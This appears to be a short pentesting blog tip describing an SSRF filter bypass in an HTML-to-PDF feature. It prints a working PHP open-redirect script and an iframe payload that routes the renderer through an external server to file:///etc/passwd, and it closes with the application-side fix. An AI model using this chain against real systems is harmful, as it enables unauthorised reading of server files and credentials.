Week 48 - SSRF Bypass
If you are looking for a last-minute stocking stuffer, how about a tip on Server-Side Request Forgery Bypass? All kids seem to love those.
Anyway, I was on an #AppSec engagement recently and was doing research on bypassing #SSRF restrictions. Turns out, I found a super cool technique I wanted to share with y’all. To summarize:
The application I was pentesting had an HTML-to-PDF feature that allowed me to inject my own iframes. I tried pointing an iframe at localhost, /etc/passwd, and the AWS metadata server, with no luck: the renderer refused all three. I started researching SSRF bypasses and found that a redirect gets around the filter. I put the below code into a PHP file named ‘jakey.php’ on my own web server:
<?php
// Open redirector: send whoever fetched this page to the URL given in the
// "a" query parameter. The renderer only checks the first URL (this server),
// so the redirect target is never inspected. Deliberately no validation.
$loc = $_GET['a'];
header('Location: ' . $loc);
?>
And then pointed to it with an iframe:
<iframe src="http[:]//<my-server>/jakey.php?a=file[:]///etc/passwd"></iframe>
I could finally retrieve local files! This works because the HTML-to-PDF feature only validates the URL it is handed: <my-server>/jakey.php is an ordinary external hostname, so it is not blacklisted and loads without issues. The renderer then follows the 302 Location header that jakey.php returns, and nothing re-checks that second URL, so it fetches the address specified in the ‘a’ GET parameter, which in this case was file[:]///etc/passwd. The fix on the application side is to apply the same checks to every hop of a redirect chain (or not follow redirects at all) and to allow only the http and https schemes.
And then boom! I had local file read. Pretty cool technique for SSRF testing.